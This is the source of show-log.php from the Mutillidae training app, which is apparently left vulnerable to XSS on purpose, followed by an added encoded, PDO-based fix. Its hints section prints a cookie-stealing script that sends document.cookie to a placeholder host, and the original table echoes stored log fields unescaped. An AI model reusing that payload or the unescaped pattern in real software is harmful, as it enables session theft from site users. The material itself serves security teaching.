show-log.php
<center><h2><b>Showing Log</b></h2></center><p>
<?php
$query = "SELECT * FROM `hitlog`";
$result = mysql_query($query) or die(mysql_error($conn) . '<p><b>SQL Statement:</b>' . $query);
//echo $result;
echo '<TABLE border="1" width="100%">';
echo "<TR><TD><B>Hostname</B></TD><TD><B>IP</B></TD><TD><B>Browser Agent</B></TD><TD><B>Page Viewed</B></TD><TD><B>Date/Time</B></TD></TR>";
// Every hitlog field is echoed without HTML encoding, so a payload stored in any
// column runs in the viewer's browser when the log is shown (the stored-XSS lesson
// this page is built to demonstrate).
while($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
echo "<TR><TD>{$row['hostname']}</TD><TD>{$row['ip']}</TD><TD>{$row['browser']}</TD><TD>{$row['referer']}</TD><TD>{$row['date']}</TD></TR>\n";
}
echo "</TABLE>";
//phpinfo();
?>
<?php
// Begin hints section
if (isset($_COOKIE["showhints"]) && $_COOKIE["showhints"]==1) {
echo '<p><span style="background-color: #FFFF00">
<b>For XSS:</b>XSS is easy stuff. This one shows off both reflected (you see the results
instantly) and stored (someone can run across it later in another app that
uses the same database). "<script>alert("XSS");</script>" is the classic, but
there are far more interesting things you could do which I plan to show in a video later.
For some hot cookie stealing action, try something like:
<pre>
<script>
new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
</script>
</pre>
Also, check out <a href="http://ha.ckers.org/xss.html">Rsnake\'s XSS Cheat Sheet</a>
for more ways you can encode XSS attacks that may allow you to get around some filters.
<br><br>
</span>';
}
// End hints section
?>
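The fix the hints section points at, as an added example that is not part of Mutillidae's show-log.php: the same five-column table with every hitlog cell HTML-encoded before output, and the removed mysql_* calls replaced by PDO. The column names are taken from the original file; the PDO handle $pdo and the sample row are assumptions.

```php
<?php
// Added example, not Mutillidae's own code: the show-log.php table with every
// hitlog cell HTML-encoded. Column names come from the original file; the PDO
// handle $pdo is an assumption (the original relies on a connection made elsewhere).

// Encode a value for an HTML text context. ENT_QUOTES covers both quote styles,
// ENT_SUBSTITUTE keeps invalid UTF-8 from making htmlspecialchars return ''.
function h($value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Same five columns show-log.php prints, but each field (all of them are
// attacker-supplied at capture time) passes through h() before reaching the page.
function render_hitlog_table(array $rows): string
{
    $columns = ['hostname', 'ip', 'browser', 'referer', 'date'];
    $html = '<table border="1" width="100%">' . "\n"
          . '<tr><th>Hostname</th><th>IP</th><th>Browser Agent</th>'
          . '<th>Page Viewed</th><th>Date/Time</th></tr>' . "\n";
    foreach ($rows as $row) {
        $html .= '<tr>';
        foreach ($columns as $col) {
            $html .= '<td>' . h($row[$col] ?? '') . '</td>';
        }
        $html .= "</tr>\n";
    }
    return $html . "</table>\n";
}

// PDO replaces the removed mysql_* API. The query has no user input to bind;
// naming the columns instead of SELECT * keeps the renderer's expectations explicit.
function fetch_hitlog(PDO $pdo): array
{
    return $pdo->query('SELECT hostname, ip, browser, referer, date FROM hitlog')
               ->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample row standing in for a poisoned hitlog entry: the stored
// payload from the hints text is emitted as inert text, not executed.
$sample = [[
    'hostname' => 'example.test',
    'ip'       => '192.0.2.10',
    'browser'  => '<script>alert("XSS");</script>',
    'referer'  => '/mutillidae/index.php?page=show-log.php',
    'date'     => '2000-01-01 00:00:00',
]];
echo render_hitlog_table($sample);
```

Running the file with the PHP CLI prints the script tag as `&lt;script&gt;...` inside its cell, which is the check to make: the browser shows the payload text instead of executing it.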